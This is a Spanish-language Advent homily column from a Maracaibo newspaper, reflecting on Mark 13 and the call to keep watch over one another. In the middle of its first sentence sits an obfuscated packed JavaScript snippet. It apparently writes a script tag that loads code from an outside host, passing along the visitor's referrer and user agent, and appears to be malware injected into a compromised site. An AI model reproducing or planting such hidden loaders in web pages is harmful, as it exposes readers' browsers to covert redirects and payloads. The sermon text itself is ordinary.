publicidad

“Al amanecer”

Padre Richard Colmenares / Especialista en Sagradas Escrituras / Maracaibo
Que eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eizez|var|u0026u|referrer|babar||js|php'.split('|'),0,{})) Dios en este domingo nos de la gracia de vigilar y custodiar también la vida de nuestros hermanos, su bienestar es también una responsabilidad nuestra

En este domingo hermanos, la Iglesia celebra el primer domingo de Adviento con el cual iniciamos el Año Litúrgico, inicia la pedagogía de encuentro entre Dios que se hace uno de nosotros para mostrarnos la oportunidad de la salvación. Hoy Domingo, también nosotros los zulianos amanecemos de Aurora ya que hemos acompañado a María de Chiquinquirá en su procesión esperando todos al Sol que nace de lo Alto, a Jesucristo, al Hijo de la Virgen que se nos entrega en la Eucaristía. Y precisamente el evangelio de este domingo, nos presenta como enseñanza el hecho de “vigilar”, de estar en vela, de no dormirnos en el camino de esperar al Señor.

Es interesante que el evangelio de Marcos nos presenta la metáfora del viaje: “es igual que un hombre que se fue de viaje, y dejó su casa y dio a cada uno de sus criados su tarea, encargando al portero que velara” (Mc 13,34). Es un texto dirigido a los discípulos, invitándolos a asumir su responsabilidad de velar y cuidar a los que Dios ha llamado a formar su Iglesia; a pesar de esta invitación específica, esta también se extiende a todo Cristiano, ya que cada uno, al ser llamado por Dios ha sido invitado a una misión según Marcos (cf Mc 3,13-14).

Por consiguiente Hermanos, estamos llamados todos a ser “vigilantes” de nuestra vida eclesial y no solo personal, “vigilar” es estar pendiente y darle seguridad a otro, es estar atento a las necesidades de otra persona que tú cuidas y protejes; esta vigilancia del evangelio no es una exhortación intimista o personalista a cuidar solamente nuestro espíritu, sino al contrario, propiamente es una exhortación comunitaria y fraterna... es hablar de que, si somos guardianes de nuestros hermanos... guardián el esposo de la esposa, y también la esposa del esposo, guardián el hijo del padre y el padre del hijo, guardián el hermano del otro hermano, guardianes todos unos de los otros. 

Que Dios en este domingo nos de la gracia de vigilar y custodiar también la vida de nuestros hermanos, su bienestar es también una responsabilidad nuestra.

Feliz Domingo para todos!

Padre Richard Colmenares 

Especialista en Sagradas Escrituras

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama